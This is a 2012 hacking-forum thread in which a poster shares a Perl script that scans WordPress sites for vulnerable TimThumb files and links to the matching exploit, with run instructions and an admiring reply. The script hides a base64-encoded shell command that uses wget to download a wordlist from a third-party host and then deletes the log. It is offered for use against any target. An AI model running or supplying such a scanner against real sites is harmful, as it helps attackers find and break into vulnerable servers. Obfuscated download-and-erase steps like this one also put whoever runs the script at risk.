.:: Blackc0de Forum ::.
 Wordpress Timthumb Scanner

Voldemort (BC Security)
Post subject: Wordpress Timthumb Scanner (Tue Feb 21, 2012 9:26 pm)

Speaking of WordPress, who doesn't know this CMS? But here I'll discuss the bug in TimThumb.
Hmm, so what is TimThumb?
TimThumb, as I understand it, is a piece of PHP code for resizing images. But behind that function there is a bug that allows remote file upload.
Let's cover how to exploit it another time, OK?
Or maybe you guys here already know how to exploit it.
Here I'm still using Perl.
Here is the script:

Code:
#!/usr/bin/perl -X
system ('clear');
print q(
___________.__      ___________.__                ___.   
\__    ___/|__| ____\__    ___/|  |__  __ __  _____\_ |__ 
  |    |  |  |/    \|    |  |  |  \|  |  \/    \| __ \
  |    |  |  |  Y Y  \    |  |  Y  \  |  /  Y Y  \ \_\ \
  |____|  |__|__|_|  /____|  |___|  /____/|__|_|  /___  /
                    \/              \/            \/    \/ Wordpress
                          http://black-c0de.org
<<----------------------------------------------------------------->>
                          Coded By Voldemort
<<----------------------------------------------------------------->>


);
my $target="";
if ($#ARGV >= 0 ) {
$target = $ARGV[0];chomp($target)
}
else
{
print "URL Target (Wordpress Path)  ex: http://site.com\/blog/ => ";
$target = <STDIN>;chomp($target);
}
use HTTP::Request;                             
use HTTP::Request::Common;                     
use HTTP::Request::Common qw(POST);           
use LWP::Simple;                               
use LWP 5.53;                                 
use LWP::UserAgent;                           
use MIME::Base64;
my $dftr = 'tim.txt';
if (-e $dftr){
print "Database Exist..\n";
sleep(2);
print "Launch Now\n\n";
}
else
{
print "Database Not Exist..\n";
sleep(1);
print "Downloading database...\n";
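# The base64 string below decodes to a shell command: wget fetches the wordlist into tim.txt
# from a third-party host, then the wget log file is deleted. Decode and review it before running.
system(decode_base64("d2dldCAtbyBsb2cgaHR0cDovL21hdHVyenlzY2kuY29tLnBsL19fbWF0dXJhMjAxMi90aW0gLU8gdGltLnR4dDtybSAtcmYgbG9n"));
# Stop if the download did not produce a usable wordlist
die "Download failed: $dftr is missing or empty\n" unless -s $dftr;
print "Downloading Success...\nLaunch Now\n\n";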
}
print "Waiting a few minute for searching vulnerable your target ($target)....!!!\n";
my $uagent    = "Mozilla/5.0 (X11; Linux i686; rv:9.0.1) Gecko/20100101 Firefox/9.0.1";

my $jml=0;
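# Load the candidate paths (one per line) from the wordlist
open(my $fh, '<', $dftr) or die "Cannot open $dftr: $!\n";
my @wordlist = <$fh>;
close $fh;
chomp(@wordlist);    # strip newlines so they do not end up in the request URL
my $byk = scalar(@wordlist);
foreach my $path (@wordlist) {
    next unless length $path;    # skip blank lines
    my $hsl = get_content($target . $path);
    # A response containing "TimThumb version" means a TimThumb script answered at this path
    if (defined $hsl && $hsl =~ /TimThumb version/i) {
        print "Your Can Exploit --> $target$path\n";
        $jml = $jml + 1;
    }
}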

if ($jml == 0){
print "Not Found TimThum\nThanks For Use My Script\nHappy Hacking\n";
}
else {
print "Found $jml TimThumb Exploit is --> http://www.exploit-db.com\/exploits\/17602/\n";
print "Thanks For Use My Script\nHappy Hacking\n";
}

# Fetch a URL and return the response body, whatever the HTTP status code
sub get_content {
    my $url = $_[0];
    my $ua = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(7);
    my $req = HTTP::Request->new(GET => $url);
    my $res = $ua->request($req);
    return $res->content;
}



How to use it:

root@voldemort:~# chmod +x <file name>
ex :
root@voldemort:~# chmod +x timthumb.pl
root@voldemort:~# ./<filename>
ex :
root@voldemort:~# ./timthumb.pl

[*] Input target. ex: [You must be registered and logged in to see this link.] (adjust the blog path to match and end it with "/")


Go ahead and try it, hope it's useful.
bl4ck4ng3l (NuuBiiTooL)
Post subject: Re: Wordpress Timthumb Scanner (Wed Feb 22, 2012 9:40 am)

Solid script, bro.
Bro, is there a subdomain for the exploit or not???